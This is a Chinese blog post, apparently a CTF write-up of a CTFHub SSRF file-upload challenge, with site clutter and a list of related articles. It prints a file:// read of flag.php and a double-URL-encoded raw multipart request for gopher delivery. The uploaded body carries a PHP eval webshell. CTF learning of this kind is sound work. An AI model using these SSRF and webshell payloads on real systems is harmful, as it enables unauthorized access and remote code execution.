CTFHUB-SSRF-上传文件

最新推荐文章于 2024-05-01 21:00:11 发布
最新推荐文章于 2024-05-01 21:00:11 发布
阅读量1.3k 收藏 1
点赞数 3
分类专栏: # CTFHUB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/118672061
版权

CTFHUB-SSRF-上传文件
先用file协议读下flag.php的内容:

file:///var/www/html/flag.php

在这里插入图片描述
可知是随便上传个文件就行
访问127.0.0.1/flag.php,是个上传界面
在这里插入图片描述
但并没有提交,所以我们得自己补一个提交按钮:

<input type="submit" name="submit">

随便抓个上传包:
在这里插入图片描述
进行两次url编码,得到:

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-a98b95350af8e30b.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A89.0%2529%2520Gecko/20100101%2520Firefox/89.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------19642135472788729183976965757%250D%250AContent-Length%253A%2520382%250D%250AOrigin%253A%2520http%253A//challenge-a98b95350af8e30b.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-a98b95350af8e30b.sandbox.ctfhub.com%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------19642135472788729183976965757%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522ab.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527ctf%2527%255D%2529%253B%253F%253E%250D%250A-----------------------------19642135472788729183976965757%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------19642135472788729183976965757–

再抓一个最初的包:
在这里插入图片描述
利用gopher去发送请求:
在这里插入图片描述

o3Ev
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1502
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8115
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2229
ssrf
CTFHub-Web-文件上传
最新发布
IceCream的博客
05-01 1250
1.编写一段PHP木马脚本2.将编写好的木马进行上传3.显示上传成功了4.使用文件上传工具进行尝试5.连接成功进入文件管理6.上翻目录找到flag文件7.打开文件查看flag。
SSRF详解 基于CTFHub(上篇)
Bossfrank的博客
04-28 1866
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2757
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
SSRF(Server-Side Request Forgery)前端挡光元件设计中的力学问题研究主要涉及软件开发与硬件工程的交叉领域,特别是在网络安全和机械结构设计方面。SSRF是一种利用服务器发起请求的安全漏洞,通常针对的是服务器...
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问.zip
04-09
开发技术-硬件
mars-ssrf:SSRFDedektörü
03-04
火星 SSRFDedektörü
exchange-ssrf-rce:交换服务
03-15
用法 python3 .\exchange-exp.py 使用方式: python PoC.py <target> ...[*] Getting ComputerName and DomainName [+] domain : xxx-xxxx | [+] computer : xxx.xxx-xxxx.xxx | [*] Getting LegacyDN ...
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2340
CTFhub ssrf 端口扫描&文件上传
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 526
CTFHUBssrf中文件上传的题目内容,记录自己遇到的问题
[WEB安全] 通过CTFHub学习SSRF
Only_kele_ 的博客
03-06 4379
目录1. ssrf简介2. 例题2.1 内网访问2.2 伪协议读文件2.3 端口扫描2.4 POST请求2.5 上传文件2.6 FastCGI协议2.7 Redis协议 1. ssrf简介 2. 例题 2.1 内网访问 2.2 伪协议读文件 2.3 端口扫描 2.4 POST请求 2.5 上传文件 直接看index.php文件,和之前的一样 再看flag.php文件,需要上传一个文件,而且只能本地上传 在POST请求那里,构造过POST请求,这里上传文件也一样,尝试构造一个文件上传的http请
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2815
SSRF相关题目实战
CTFHub技能树 Web-文件上传详解
千寻的博客
11-21 3058
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
ctfhub web-SSRF(服务器请求伪造) 文件上传
SinAlone的博客
06-30 387
提示:这次需要上传一个文件到flag.php了.祝你好运 使用file://伪协议查看flag.php的php源码 得知flag.php只接受来自127.0.0.1的访问 访问flag.php 观察到只有浏览文件没有提交文件,咱们打开f12自己给他加个提交。 然后选好要上传的文件成下图 文件随便是啥,咱就用个一句话木马 此时用burp抓包拦截请求,点击提交查询 得到如下包 将其中的Host内容改为 Host:127.0.0.1:80 之后将此包内容复制粘贴,
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1785
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
CTFHUB SSRF文件上传
07-28
根据提供的引用内容,CTFHUB SSRF文件上传是指通过SSRF漏洞实现对目标服务器进行文件上传的攻击。在文件上传过程中,攻击者可以构造恶意请求,将文件上传到目标服务器上。具体的攻击方法可以使用常见的绕过技巧,如利用特殊字符、绕过短网址、利用特殊编码等。\[3\]同时,攻击者还可以通过修改请求头中的Content-Length字段来伪造文件大小,绕过服务器的文件上传限制。\[1\]\[2\]需要注意的是,CTFHUB SSRF文件上传是一种安全漏洞攻击,严禁在未授权的情况下进行此类行为,违法者将承担法律责任。 #### 引用[.reference_title] - *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值